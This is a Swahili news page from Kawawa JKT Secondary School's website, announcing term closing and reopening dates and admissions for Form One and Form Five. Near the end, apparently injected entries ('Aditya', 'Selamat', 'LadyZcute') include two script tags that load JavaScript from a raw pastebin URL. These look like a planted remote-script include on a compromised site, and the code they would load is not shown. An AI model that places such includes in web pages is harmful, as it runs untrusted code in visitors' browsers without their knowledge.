Latest news

KUFUNGA SHULE

Wanafunzi wote wa kidato cha kwanza,pili,tatu,tano na sita wanatarajia kufunga shule kuanzia tarehe 24/11/2017... Kidato cha kwanza wanatarijia kufunga shule tarehe 28/11/2017. Kidato cha pili,tatu na tano wanatarijia kufunga shule tarehe 24/11/2017. Kidato cha sita wanatarijia kufunga shule tarehe 20/11/2017. Wanafunzi wote wa bweni(boarding), kuanzia kidato cha kwanza mpaka cha sita watafungua shule tarehe 07/01/2018. Wanafunzi wote wa kutwa(day), kuanzia kidato cha kwanza mpaka cha sita watafungua shule tarehe 08/01/2018.

Other News

KUJIUNGA NA SHULE

Kawawa secondary school imeanza kutoa form kwa ajili ya mwaka mpya wa masomo...

NAFASI ZA MASOMO

MKUU WA SHULE YA SEKONDARI KAWAWA (JKT) ILIYOPO MAFINGA - IRINGA ANAPENDA KUUTANGAZIA UMMA KUWA SHULE INAPOKEA MAOMBI YA WOTE WANAOHITAJI KUJIUNGA KIDATO CHA TANO JULAI 2018 KATIKA TAHASUSI ZA HGK,HGL & HKL .

KUFUNGA SHULE

NDUGU WAZAZI NA WALENZI

NAFASI ZA MASOMO

MKUU WA SHULE YA SEKONDARI KAWAWA (JKT) ILIYOPO MAFINGA - IRINGA ANAPENDA KUUTANGAZIA UMMA KUWA SHULE INAPOKEA MAOMBI YA WOTE WANAOHITAJI KUJIUNGA KIDATO CHA KWANZA JANUARI 2019.

NAFASI ZA MASOMO 2019

MKUU WA SHULE YA SEKONDARI KAWAWA (JKT) ILIYOPO MAFINGA - IRINGA ANAPENDA KUUTANGAZIA UMMA KUWA SHULE INAPOKEA MAOMBI YA WOTE WANAOHITAJI KUJIUNGA KIDATO CHA TANO JULAI 2019 KATIKA TAHASUSI ZA HGK,HGL & HKL .

Aditya

Selamat

script type="text/javascript" src="https://pastebin.com/raw/ntw9EKCm">

script type="text/javascript" src="https://pastebin.com/raw/ntw9EKCm">

z

z

babymoon

babymoon

Touch By LadyZcute

Touch By LadyZcute

© 2017 Kawawa JKT Secondary School. All Rights Reserved.